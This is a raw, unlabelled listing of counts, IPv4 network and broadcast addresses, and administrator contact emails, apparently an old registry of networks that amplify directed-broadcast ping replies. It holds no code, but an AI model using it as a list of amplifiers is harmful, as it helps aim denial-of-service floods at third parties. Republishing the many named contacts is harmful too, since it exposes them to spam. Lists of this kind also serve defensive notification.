internic@doitnow.com 25 207.98.156.255 hp@doitnow.com 25 207.98.159.255 hp@doitnow.com 25 209.223.174.255 treyco@internow.net 25 209.223.175.255 treyco@internow.net 25 209.144.193.255 boo@stilyagin.com 25 216.103.13.0 ip-admin@pbi.net 25 209.76.22.0 kenny@twnetwork.com 25 212.140.54.0 support@bt.net 25 212.140.55.0 support@bt.net 25 207.104.111.0 nomailbox@nowhere 25 207.164.163.0 debbie@bellglobal.com 25 216.100.214.0 sysadmin@access1.net 25 209.76.22.255 kenny@twnetwork.com 25 209.82.81.255 NOCToronto@metronet.ca 25 207.164.163.255 debbie@bellglobal.com 25 216.100.214.255 sysadmin@access1.net 25 206.99.44.0 egra@adinet.com.uy 25 216.84.57.0 support@elpn.com 25 208.158.122.0 karen@fmig.com 25 206.47.196.0 25 210.127.200.0 mgr@matrix.shinbiro.com, ip@matrix.shinbiro.com 25 207.66.209.0 pat@wolfe.net 25 206.47.216.0 noc@in.bell.ca 25 206.99.44.255 egra@adinet.com.uy 25 216.84.57.255 support@elpn.com 25 206.47.196.255 noc@in.bell.ca 25 206.47.216.255 noc@in.bell.ca 25 207.3.16.0 hostmaster@netmcr.com 25 207.3.17.0 hostmaster@netmcr.com 25 209.7.133.0 wdahlen@mail.isbe.state.il.us 25 207.3.16.255 hostmaster@netmcr.com 25 207.3.17.255 hostmaster@netmcr.com 25 209.7.133.255 wdahlen@mail.isbe.state.il.us 25 210.229.142.255 hostmaster@nic.ad.jp 25 208.150.1.0 hostmaster@netmcr.com 25 208.150.7.0 hostmaster@netmcr.com 25 208.150.10.0 hostmaster@netmcr.com 25 208.150.11.0 hostmaster@netmcr.com 25 208.150.12.0 hostmaster@netmcr.com 25 208.154.141.0 mosesm@usa.ibs.org 25 209.79.176.0 diamond@quick.net 25 208.150.1.255 hostmaster@netmcr.com 25 208.150.7.255 hostmaster@netmcr.com 25 208.150.10.255 hostmaster@netmcr.com 25 208.150.11.255 hostmaster@netmcr.com 25 208.150.12.255 hostmaster@netmcr.com 25 208.154.141.255 mosesm@usa.ibs.org 25 208.151.220.0 ipswip@cw.net 25 207.60.128.255 hostmaster@tiac.net 25 209.226.49.0 noc@in.bell.ca 25 209.226.51.0 noc@in.bell.ca 25 208.208.54.0 tom@metaverse.com 25 207.250.88.0 hostmaster@inc.net 25 209.226.49.255 noc@in.bell.ca 25 209.226.51.255 noc@in.bell.ca 25 208.208.54.255 tom@metaverse.com 25 206.187.60.255 Dave@dra.com 25 207.250.88.255 hostmaster@inc.net 25 209.190.102.255 hostmaster@thenap.net 25 210.127.194.255 mgr@matrix.shinbiro.com, ip@matrix.shinbiro.com 25 208.129.226.255 vince@markzware.com 25 208.168.208.0 julianc@peganet.net 25 209.249.219.0 noc@above.net 25 209.249.219.255 noc@above.net 25 207.60.165.255 hostmaster@tiac.net 25 208.2.81.0 jstabler@emi.net 25 208.154.220.255 jon@thoughtbubble.com 25 206.72.23.255 maut@pionet.net 25 210.145.26.255 hostmaster@nic.ad.jp 25 209.198.228.0 rvillalo@gbm.net 25 209.198.228.255 25 209.55.73.0 jimp@brandx.net 25 208.212.143.255 david.moyle@teligent.com 24 62.112.0.0 ripe-role@noc.online.be 24 62.160.105.0 hostmaster@oleane.net 24 62.160.105.255 hostmaster@oleane.net 24 134.241.38.0 hostmaster@umassp.edu 24 134.241.38.255 hostmaster@umassp.edu 24 150.176.58.255 hostmaster@mail.firn.edu 24 161.223.34.0 24 164.47.171.0 Mark.Montanez@pcc.cccoes.edu 24 164.47.171.255 Mark.Montanez@pcc.cccoes.edu 24 167.196.216.0 jda51@state.ga.us 24 167.196.217.255 jda51@state.ga.us 24 192.208.22.0 hays@wapa.gov 24 192.208.22.255 hays@wapa.gov 24 193.104.180.255 24 193.106.23.0 yp@jouve.fr 24 193.119.172.0 24 193.119.172.255 24 193.140.136.0 root@risc01.bim.gantep.edu.tr 24 193.140.136.255 root@risc01.bim.gantep.edu.tr 24 193.140.137.0 root@risc01.bim.gantep.edu.tr 24 193.140.137.255 root@risc01.bim.gantep.edu.tr 24 193.140.138.0 root@risc01.bim.gantep.edu.tr 24 193.140.138.255 root@risc01.bim.gantep.edu.tr 24 193.225.18.255 jules@apacs.pote.hu, dergo@apacs.pote.hu, rugo@apacs.pote.hu 24 193.51.50.0 24 193.51.50.255 24 193.73.130.0 te@sda-ats.ch 24 194.159.126.255 postmaster@idg.co.uk 24 195.222.211.255 24 195.238.142.0 stein@swol.de, kniesel@dig.de 24 195.238.142.255 stein@swol.de, kniesel@dig.de 24 195.74.150.255 rday@blacksunplc.com, hostmaster@red.net 24 195.82.98.255 joel@mailbox.net.uk 24 198.174.19.0 spannaus@ties.k12.mn.us 24 198.174.19.255 spannaus@ties.k12.mn.us 24 199.10.239.0 DSN1GCM@dsn10.med.navy.mil 24 199.104.18.0 hathpaul@ba.isu.edu 24 199.104.18.255 hathpaul@ba.isu.edu 24 199.122.4.0 yano@fwva.saic.com 24 199.182.243.0 Louis_Lee@icgcomm.com 24 199.182.243.255 Louis_Lee@icgcomm.com 24 199.2.208.0 NOC@sprint.net 24 199.208.88.0 24 199.208.88.255 24 199.211.154.0 moffettm@dmcm.ssc.af.mil 24 200.129.170.0 gomide@nic.br 24 200.15.17.0 hostmaster@sesqui.net 24 200.18.41.0 gomide@nic.br 24 200.5.200.0 nomailbox@nowhere 24 200.5.200.255 nomailbox@nowhere 24 202.213.234.255 hostmaster@nic.ad.jp 24 202.213.32.0 hostmaster@nic.ad.jp 24 202.213.32.255 hostmaster@nic.ad.jp 24 202.234.4.0 hostmaster@nic.ad.jp 24 202.234.4.255 hostmaster@nic.ad.jp 24 202.238.85.0 hostmaster@nic.ad.jp 24 202.238.85.255 hostmaster@nic.ad.jp 24 202.24.143.0 hostmaster@nic.ad.jp 24 202.33.96.0 hostmaster@nic.ad.jp 24 202.39.224.0 admin@hinet.net, chlin@netnews.hinet.net 24 202.39.224.255 admin@hinet.net, chlin@netnews.hinet.net 24 202.39.225.0 admin@hinet.net, chlin@netnews.hinet.net 24 202.39.225.255 admin@hinet.net, chlin@netnews.hinet.net 24 202.51.128.0 hemantha@sri.lanka.net, channa@sri.lanka.net 24 202.82.245.255 noc@hkstar.com 24 203.108.225.0 net-ops@list.ozemail.com.au 24 203.242.136.255 mgr@ktnet.co.kr, ip@ktnet.co.kr 24 203.96.51.0 craig@iprolink.co.nz, jshaw@actrix.gen.nz, jims@optimation.co.nz 24 204.176.205.255 lfo@brooktrout.com 24 204.180.36.255 NOC@sprint.net 24 204.210.82.0 rwintel@twmaine.com 24 204.210.82.255 rwintel@twmaine.com 24 204.210.83.0 rwintel@twmaine.com 24 204.84.6.255 hostmaster@ncren.net 24 205.154.165.0 nes@4c.net 24 205.160.84.255 NOC@sprint.net 24 205.213.150.255 nic@mail.wiscnet.net 24 205.221.190.0 rparis@ihcc.cc.ia.us 24 205.221.190.255 rparis@ihcc.cc.ia.us 24 205.221.198.255 hikep@urbandale.k12.ia.us 24 205.230.184.0 mpr@li.net 24 205.230.189.0 bob@new-york.net 24 205.237.226.255 nomailbox@nowhere 24 206.1.101.0 hostinfo@psi.com 24 206.101.238.0 nomailbox@nowhere 24 206.101.238.255 nomailbox@nowhere 24 206.104.102.0 netadmin@onramp.net 24 206.104.102.255 netadmin@onramp.net 24 206.108.86.255 bhewlitt@interlog.com 24 206.132.155.255 snvnoc@globalcenter.net 24 206.150.180.0 billw@mail.icongrp.com 24 206.150.180.255 billw@mail.icongrp.com 24 207.163.162.0 hostmaster@alameda-coe.k12.ca.us 24 208.167.146.0 lpowers@eastky.net 24 206.69.212.0 bamette@colum.edu 24 212.60.128.0 hostmaster@aconet.de, fschulte@hightek.com 24 207.137.159.0 noc@atmnet.net 24 212.60.128.255 hostmaster@aconet.de, fschulte@hightek.com 24 207.202.66.255 noc@corp.idt.net 24 207.202.66.0 noc@corp.idt.net 24 207.99.200.255 art@lacoe.edu 24 207.176.225.255 eddy@genet.org 24 210.169.71.0 hostmaster@nic.ad.jp 24 207.176.225.0 eddy@genet.org 24 210.224.249.255 hostmaster@nic.ad.jp 24 210.145.18.0 hostmaster@nic.ad.jp 24 208.12.176.0 nomailbox@nowhere 24 210.224.249.0 hostmaster@nic.ad.jp 24 210.145.18.255 hostmaster@nic.ad.jp 24 206.253.240.255 cql@cdimed.com 24 208.156.13.0 Paul.Burke@mci.com 24 216.145.152.0 troyraby@inwave.com 24 207.98.159.0 hp@doitnow.com 24 207.49.243.0 troyraby@inwave.com 24 207.49.244.0 troyraby@inwave.com 24 207.49.245.0 troyraby@inwave.com 24 207.49.246.0 troyraby@inwave.com 24 208.144.7.255 DIGICON@mindspring.com 24 208.156.13.255 Paul.Burke@mci.com 24 207.155.93.255 hostmaster@softaware.com 24 216.145.152.255 troyraby@inwave.com 24 209.122.173.255 domreg@erols.com 24 207.49.243.255 troyraby@inwave.com 24 207.49.244.255 troyraby@inwave.com 24 207.49.245.255 troyraby@inwave.com 24 207.49.246.255 troyraby@inwave.com 24 210.164.17.0 hostmaster@nic.ad.jp 24 207.104.102.0 support@access1.net 24 207.104.109.0 nomailbox@nowhere 24 210.227.123.0 hostmaster@nic.ad.jp 24 208.163.10.255 sullivan@ezwv.com 24 210.164.17.255 hostmaster@nic.ad.jp 24 207.104.102.255 support@access1.net 24 210.227.123.255 hostmaster@nic.ad.jp 24 208.154.170.255 ipadmin@cw.net 24 208.205.235.255 amurarka@splyglass.com 24 207.152.24.0 hostmaster@telalink.net 24 208.205.235.0 amurarka@splyglass.com 24 207.152.24.255 hostmaster@telalink.net 24 212.140.54.255 support@bt.net 24 207.1.208.255 lbemerer@lmccinti.com 24 209.77.127.0 rick@foothill.net 24 208.147.191.0 cdc@groupz.net 24 209.183.196.0 noc@atlantech.net 24 209.43.37.255 robert@iquest.net 24 208.147.191.255 cdc@groupz.net 24 209.102.103.255 robertc@savvis.com 24 208.131.107.255 nomailbox@nowhere 24 206.211.86.0 renae.h.key@gte.sprint.com 24 208.197.157.0 24 208.197.157.255 sales@texnet.net 24 208.3.238.0 parker@nandover.mec.edu 24 209.47.3.255 Andrew_Schachter@tbwacanada.com 24 206.52.82.0 bdot@toto.net 24 208.210.210.0 laberged@aascu.nche.edu 24 209.164.131.0 Bill_Stritzinger@dataplace.net 24 209.164.131.255 Bill_Stritzinger@dataplace.net 24 209.186.58.0 dns@cerf.net 24 209.79.64.0 nomailbox@nowhere 24 209.79.64.255 nomailbox@nowhere 24 210.68.152.0 24 206.52.82.255 bdot@toto.net 23 24.5.113.0 noc@noc.home.net 23 24.6.61.0 noc@noc.home.net 23 62.20.175.255 ip@telia.net, registry@telia.net, dns@telia.net 23 143.213.130.0 MILLARDD@shafter-emh3.army.mil 23 160.217.1.255 Lhotka@jcu.cz, norit.jo@mtvne.com 23 192.204.250.0 trouble@prep.net 23 192.204.250.255 trouble@prep.net 23 192.220.3.255 jvalluzz@pcc.edu 23 193.44.96.0 orjan.l.swedberg@telia.se 23 193.44.96.255 orjan.l.swedberg@telia.se 23 193.44.97.255 orjan.l.swedberg@telia.se 23 193.73.218.0 kobi@swiss.nexus-ag.com 23 194.159.126.0 postmaster@idg.co.uk 23 194.77.138.0 info@webmad.de, hostmaster@dpn.de 23 194.89.12.0 23 194.89.12.255 23 194.89.13.255 23 194.89.14.255 23 195.182.181.0 23 195.182.188.0 23 195.182.189.0 y.cheung@dccl.net, c.heald@dccl.net 23 195.220.107.0 23 195.224.218.0 rush@gxn.net, lol@xara.net 23 195.89.4.0 webmaster@the.site.ch 23 195.89.4.255 webmaster@the.site.ch 23 195.89.6.0 webmaster@the.site.ch 23 195.89.6.255 webmaster@the.site.ch 23 195.99.148.0 23 195.99.148.255 23 198.168.5.0 registrar@interlink.net 23 198.168.5.255 registrar@interlink.net 23 198.188.172.0 nes@4c.net 23 198.59.243.0 23 198.64.33.0 hostmaster@sesqui.net 23 198.64.33.255 hostmaster@sesqui.net 23 199.10.138.0 RLINDNER@force.cnsl.spear.navy.mil 23 199.10.138.255 RLINDNER@force.cnsl.spear.navy.mil 23 199.111.88.0 jaj@virginia.edu 23 199.111.88.255 jaj@virginia.edu 23 199.122.4.255 yano@fwva.saic.com 23 199.176.66.255 michael_jones@chi.leoburnett.com 23 199.211.192.0 ron_black_at_navtrans@fmso.navy.mil 23 199.211.192.255 ron_black_at_navtrans@fmso.navy.mil 23 199.252.20.0 23 199.252.20.255 23 199.252.23.0 23 199.35.107.255 rick@merc-int.com 23 199.76.61.0 philt@amelia.bham.lib.al.us 23 200.38.68.0 proeza@mpsnet.com.mx 23 200.38.68.255 proeza@mpsnet.com.mx 23 202.212.202.0 hostmaster@nic.ad.jp 23 202.212.202.255 hostmaster@nic.ad.jp 23 202.213.234.0 hostmaster@nic.ad.jp 23 202.218.13.255 technical@apnic.net 23 203.2.75.255 mark@cristal.syd.pronet.com 23 203.21.29.0 hostmaster@telstra.net 23 203.242.136.0 mgr@ktnet.co.kr, ip@ktnet.co.kr 23 203.29.91.0 hostmaster@telstra.net 23 203.38.28.0 hostmaster@telstra.net 23 204.111.64.0 wpirtle@globalcom.net 23 204.111.64.255 wpirtle@globalcom.net 23 204.116.96.0 mckee@admin.infoave.net 23 204.151.38.0 bterry@burnettgroup.com 23 204.174.235.255 jbailey@aurora.net 23 204.176.205.0 lfo@brooktrout.com 23 204.179.121.0 help@uunet.uu.net 23 204.179.121.255 help@uunet.uu.net 23 204.203.9.255 its@nw.verio.net 23 204.213.230.0 paolucci@riddler.com 23 204.213.230.255 paolucci@riddler.com 23 204.48.149.255 tuma@ceo.sbceo.k12.ca.us 23 204.49.196.0 dns@sprintans.net 23 204.57.105.0 mjudge@atsi.net 23 204.97.104.0 23 204.97.104.255 23 204.97.21.0 stewartw@fpc.edu 23 205.138.176.0 brian@dstream.net 23 205.138.176.255 brian@dstream.net 23 205.139.15.255 brendan@genghis.com 23 205.178.84.0 dave@brainstorm.net 23 205.200.16.0 mtsdns@mts.net 23 205.200.16.255 mtsdns@mts.net 23 205.231.229.0 Daniel.Malcor@internetaddress.com 23 205.231.229.255 Daniel.Malcor@internetaddress.com 23 205.243.90.0 nomailbox@nowhere 23 205.243.90.255 nomailbox@nowhere 23 206.0.193.0 hostinfo@psi.com 23 206.13.40.0 jonathan@sonic.net 23 206.132.208.255 ipadmin@globalcenter.net 23 206.151.238.255 baltar@sy.com 23 206.171.16.0 jason@symbio.net 23 209.63.149.0 cbrown@advanced-power.com 23 207.163.162.255 hostmaster@alameda-coe.k12.ca.us 23 209.147.15.0 art@lacoe.edu 23 209.48.15.0 dns@digex.net 23 207.238.117.0 dns@digex.net 23 208.156.205.0 nomailbox@nowhere 23 212.55.208.0 admin@cyberlink.ch 23 207.238.117.255 dns@digex.net 23 208.156.205.255 nomailbox@nowhere 23 212.55.207.255 admin@cyberlink.ch 23 207.201.65.0 support@celestar.com 23 207.201.74.0 peter@vsnet.com 23 207.201.75.0 alif@unibaseinc.com 23 207.201.78.0 matthew@mcr.net 23 207.201.124.0 support@celestar.com 23 210.228.160.0 hostmaster@nic.ad.jp 23 208.236.172.0 ward@intercom.net 23 208.236.173.0 ward@intercom.net 23 208.236.174.0 ward@intercom.net 23 212.55.207.0 admin@cyberlink.ch 23 207.201.65.255 support@celestar.com 23 207.201.74.255 peter@vsnet.com 23 207.201.75.255 alif@unibaseinc.com 23 207.201.124.255 support@celestar.com 23 208.236.172.255 ward@intercom.net 23 208.236.173.255 ward@intercom.net 23 208.156.204.255 nomailbox@nowhere 23 208.144.7.0 DIGICON@mindspring.com 23 207.104.20.0 jason@symbio.net 23 206.37.32.0 norberg@medsva.brooks.af.mil 23 209.180.96.0 paul@uswest.net 23 206.253.240.0 cql@cdimed.com 23 207.104.20.255 jason@symbio.net 23 208.204.158.255 brett@winkcomm.com 23 212.146.0.0 jukka.ylonen@kpy.fi, ripe.tech@raketti.net, ripe.registry@raketti.net, ripe.sales@raketti.net, petri.siltakoski@kpy.fi 23 212.250.1.0 nmc@ntli.net, pulak.rakshit@ntli.net 23 212.250.2.0 nmc@ntli.net, bob.procter@ntli.net 23 212.58.5.0 cengiz@doruk.net.tr, gokhan@doruk.net.tr 23 212.58.24.0 ctarhan@pcworld.com.tr, cengiz@doruk.net.tr 23 212.146.32.0 jukka.ylonen@kpy.fi, ripe.tech@raketti.net, ripe.registry@raketti.net, ripe.sales@raketti.net, petri.siltakoski@kpy.fi 23 216.205.48.0 neteng@sagenetworks.com 23 216.205.49.0 neteng@sagenetworks.com 23 209.235.69.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.70.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.71.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.72.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.73.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.74.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.75.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.76.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.77.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.78.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.79.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.80.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 207.104.103.0 support@access1.net 23 209.235.112.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.113.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.114.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.115.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.116.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.117.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.118.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.119.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.120.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.121.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.122.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.123.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.124.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.125.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.126.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.127.0 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.94.160.0 wells@wctc.net 23 216.100.190.0 ip-admin@pbi.net 23 216.100.191.0 ip-admin@pbi.net 23 209.79.246.0 ip-admin@pbi.net 23 209.79.247.0 ip-admin@pbi.net 23 210.141.247.0 hostmaster@nic.ad.jp 23 208.235.248.0 pokeefe@checkfree.com 23 212.250.1.255 nmc@ntli.net, pulak.rakshit@ntli.net 23 212.250.2.255 nmc@ntli.net, bob.procter@ntli.net 23 212.58.5.255 cengiz@doruk.net.tr, gokhan@doruk.net.tr 23 212.146.7.255 jukka.ylonen@kpy.fi, ripe.tech@raketti.net, ripe.registry@raketti.net, ripe.sales@raketti.net, petri.siltakoski@kpy.fi 23 212.58.28.255 cengiz@doruk.net.tr, gokhan@doruk.net.tr 23 212.58.29.255 paksoy@turktel.net, cengiz@doruk.net.tr 23 216.205.48.255 neteng@sagenetworks.com 23 216.205.49.255 neteng@sagenetworks.com 23 216.205.50.255 neteng@sagenetworks.com 23 209.235.69.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.70.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.71.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.72.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.73.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.74.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.75.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.76.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.77.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.78.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.79.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.80.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.112.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.113.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.114.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.115.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.116.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.117.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.118.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.119.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.120.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.121.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.122.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.123.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.124.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.125.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.126.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 209.235.127.255 neteng@sagenetworks.com, 'abuse@sagenetworks.com' 23 216.100.185.255 ip-admin@pbi.net 23 216.100.190.255 ip-admin@pbi.net 23 216.100.191.255 ip-admin@pbi.net 23 209.79.246.255 ip-admin@pbi.net 23 209.79.247.255 ip-admin@pbi.net 23 210.141.247.255 hostmaster@nic.ad.jp 23 208.235.248.255 pokeefe@checkfree.com 23 216.205.50.0 neteng@sagenetworks.com 23 207.167.204.0 tbrunt@tvo.org 23 209.172.65.255 hostmaster@innetix.com 23 207.109.152.255 dns-info@uswest.net 23 209.21.153.255 hostmaster@harvard.net 23 207.113.154.255 hostmaster@crl.com 23 207.167.204.255 tbrunt@tvo.org 23 207.193.232.255 hostmaster@swbell.net 23 208.145.15.0 stephent@intelis.com 23 207.115.54.0 harrycw@prodigy.net 23 206.234.131.0 hostinfo@psi.com 23 207.203.220.0 ipadmin@bellsouth.net 23 207.86.227.0 dns@digex.net 23 209.131.12.255 nestigoy@mica.net 23 208.145.15.255 stephent@intelis.com 23 207.115.54.255 harrycw@prodigy.net 23 207.203.220.255 ipadmin@bellsouth.net 23 212.246.36.0 jukka.ylonen@kpy.fi, petri.siltakoski@kpy.fi 23 209.43.37.0 23 209.21.131.0 hostmaster@harvard.net 23 209.226.149.0 noc@in.bell.ca 23 207.212.182.0 ip-admin@pbi.net 23 208.240.184.255 smw@tritonworks.com 23 209.208.145.0 hostmaster@pfmc.net 23 209.214.177.0 ipadmin@bellsouth.net 23 209.214.181.0 ipadmin@bellsouth.net 23 216.76.212.0 ipadmin@bellsouth.net 23 206.234.131.255 hostinfo@psi.com 23 209.208.145.255 hostmaster@pfmc.net 23 209.214.177.255 ipadmin@bellsouth.net 23 209.214.181.255 ipadmin@bellsouth.net 23 216.76.212.255 ipadmin@bellsouth.net 23 209.226.144.0 noc@in.bell.ca 23 208.244.213.0 pforbes@opcode.com 23 208.129.226.0 vince@markzware.com 23 209.48.15.255 dns@digex.net 23 207.77.72.255 george@laserlink.net 23 209.226.144.255 noc@in.bell.ca 23 209.226.149.255 noc@in.bell.ca 23 209.39.117.0 netadmin@onramp.net 23 207.126.109.255 noc@above.net 23 209.39.117.255 netadmin@onramp.net 23 208.168.208.255 julianc@peganet.net 23 207.194.160.255 domains@bctel.net 23 207.94.162.255 owen@hodes.com 23 208.20.79.0 NOC@sprint.net 23 208.20.79.255 NOC@sprint.net 23 207.63.253.255 twilliams@lth6.k12.il.us 23 207.63.254.255 twilliams@lth6.k12.il.us 23 210.159.103.255 hostmaster@nic.ad.jp 23 209.7.240.0 djurewic@lth3.k12.il.us 23 209.7.240.255 djurewic@lth3.k12.il.us 23 209.122.30.255 domreg@erols.com 23 210.68.152.255 22 24.5.113.255 noc@noc.home.net 22 134.241.142.255 hostmaster@umassp.edu 22 134.241.250.255 hostmaster@umassp.edu 22 140.239.42.255 hostmaster@harvard.net 22 152.9.100.0 westg@mars.nccu.edu 22 152.9.100.255 westg@mars.nccu.edu 22 158.59.12.255 snicho@co.arlington.va.us 22 161.223.34.255 22 192.101.126.0 DSN1GCM@dsn10.med.navy.mil 22 192.122.222.0 aconway@hdl.ie 22 192.122.222.255 aconway@hdl.ie 22 193.0.84.255 Marcin.Gromisz@fuw.edu.pl, Michal.Jankowski@fuw.edu.pl 22 193.106.9.255 yp@jouve.fr 22 193.49.105.0 cambon@lirmm.fr, gg@lirmm.fr 22 193.73.128.0 te@sda-ats.ch 22 193.98.234.0 admin@bbr-bremen.de 22 193.98.234.255 admin@bbr-bremen.de 22 194.100.10.0 route-adm@clinet.fi, hsu@bbnetworks.net 22 194.100.10.255 route-adm@clinet.fi, hsu@bbnetworks.net 22 194.100.11.0 route-adm@clinet.fi, hsu@bbnetworks.net 22 194.100.14.0 route-adm@clinet.fi, hsu@bbnetworks.net 22 194.100.14.255 route-adm@clinet.fi, hsu@bbnetworks.net 22 194.137.9.255 jukka.vesterinen@ctse.fi 22 194.254.148.0 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr, aperio@luminy.univ-mrs.fr 22 194.254.149.0 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr, aperio@luminy.univ-mrs.fr 22 194.64.121.255 schreiber@otterbach.de 22 194.73.96.0 dcheetham@gateshead.ac.uk 22 194.73.96.255 dcheetham@gateshead.ac.uk 22 194.75.152.255 chris@delphi.com, ianreeves@delphi.com 22 194.89.13.0 22 195.182.176.255 22 195.182.188.255 22 195.182.189.255 y.cheung@dccl.net, c.heald@dccl.net 22 195.27.208.255 spona@tmt.de, hoereth@tmt.de, peter.maisel@maisel.de, hostmaster@maisel.de 22 198.123.17.255 NSIOPS@nsipo.nasa.gov 22 198.60.134.0 hall@sandbox.net 22 198.60.134.255 hall@sandbox.net 22 199.108.74.0 dns@cerf.net 22 199.211.153.0 moffettm@dmcm.ssc.af.mil 22 199.76.61.255 philt@amelia.bham.lib.al.us 22 200.10.112.0 carlospe@ssdnet.com.ar 22 200.10.112.255 carlospe@ssdnet.com.ar 22 200.17.93.0 gomide@nic.br 22 200.17.93.255 gomide@nic.br 22 202.167.1.0 22 202.167.1.255 22 202.208.64.0 technical@apnic.net 22 202.213.5.255 hostmaster@nic.ad.jp 22 202.77.222.0 belcina@attmail.com 22 202.77.222.255 belcina@attmail.com 22 203.126.205.0 hostmaster@singnet.com.sg 22 203.127.187.0 jeremy@sns.com.sg 22 203.140.3.0 hostmaster@nic.ad.jp 22 203.140.3.255 hostmaster@nic.ad.jp 22 203.146.30.0 kanok@loxinfo.co.th, patkamol@loxinfo.co.th 22 203.21.30.0 hostmaster@telstra.net 22 203.238.129.0 mgr@nownuri.net, ip@nownuri.net 22 203.26.109.255 hostmaster@telstra.net 22 204.112.189.0 admin@autobahn.mb.ca 22 204.112.189.255 admin@autobahn.mb.ca 22 204.131.232.255 dave@psd.k12.co.us 22 204.133.45.0 sbrown@co.weld.co.us 22 204.133.45.255 sbrown@co.weld.co.us 22 204.151.38.255 bterry@burnettgroup.com 22 204.158.119.0 gjenere@tenet.edu 22 204.180.36.0 NOC@sprint.net 22 204.192.47.255 noc@digex.net 22 204.234.20.0 murbach@docsun.doc.state.ne.us 22 204.234.20.255 murbach@docsun.doc.state.ne.us 22 204.234.21.0 murbach@docsun.doc.state.ne.us 22 204.234.22.255 murbach@docsun.doc.state.ne.us 22 204.248.113.255 NOC@sprint.net 22 204.29.20.255 edm@nwnexus.wa.com 22 204.48.149.0 tuma@ceo.sbceo.k12.ca.us 22 204.49.196.255 dns@sprintans.net 22 204.57.191.0 john@bmi.net 22 205.139.15.0 brendan@genghis.com 22 205.213.150.0 nic@mail.wiscnet.net 22 205.247.7.255 sbriggs@i-2000.com 22 206.129.189.0 dns-admin@ixa.net 22 206.135.165.0 dnstech@eni.net 22 206.144.157.0 stan@riversidecolor.com 22 206.16.65.0 prophead@blacktop.com 22 206.165.94.0 noc@globalcenter.net 22 206.165.94.255 noc@globalcenter.net 22 210.75.39.0 weixian@sti.gd.cn, fangxx@sti.gd.cn 22 207.213.24.255 dennis@globalpac.com 22 208.156.204.0 nomailbox@nowhere 22 210.141.237.0 hostmaster@nic.ad.jp 22 207.153.112.0 noc@netrail.net 22 207.167.112.0 sheri@inetworld.net 22 210.134.206.0 hostmaster@nic.ad.jp 22 210.156.209.0 hostmaster@nic.ad.jp 22 210.156.210.0 hostmaster@nic.ad.jp 22 207.153.112.255 noc@netrail.net 22 208.12.176.255 nomailbox@nowhere 22 210.156.210.255 hostmaster@nic.ad.jp 22 209.122.173.0 domreg@erols.com 22 206.37.32.255 norberg@medsva.brooks.af.mil 22 209.215.20.0 ipadmin@bellsouth.net 22 216.78.24.0 ipadmin@bellsouth.net 22 212.58.28.0 cengiz@doruk.net.tr, gokhan@doruk.net.tr 22 210.159.100.0 hostmaster@nic.ad.jp 22 210.159.113.0 hostmaster@nic.ad.jp 22 210.159.115.0 hostmaster@nic.ad.jp 22 210.159.118.0 hostmaster@nic.ad.jp 22 206.216.125.0 vala@wvpa.com 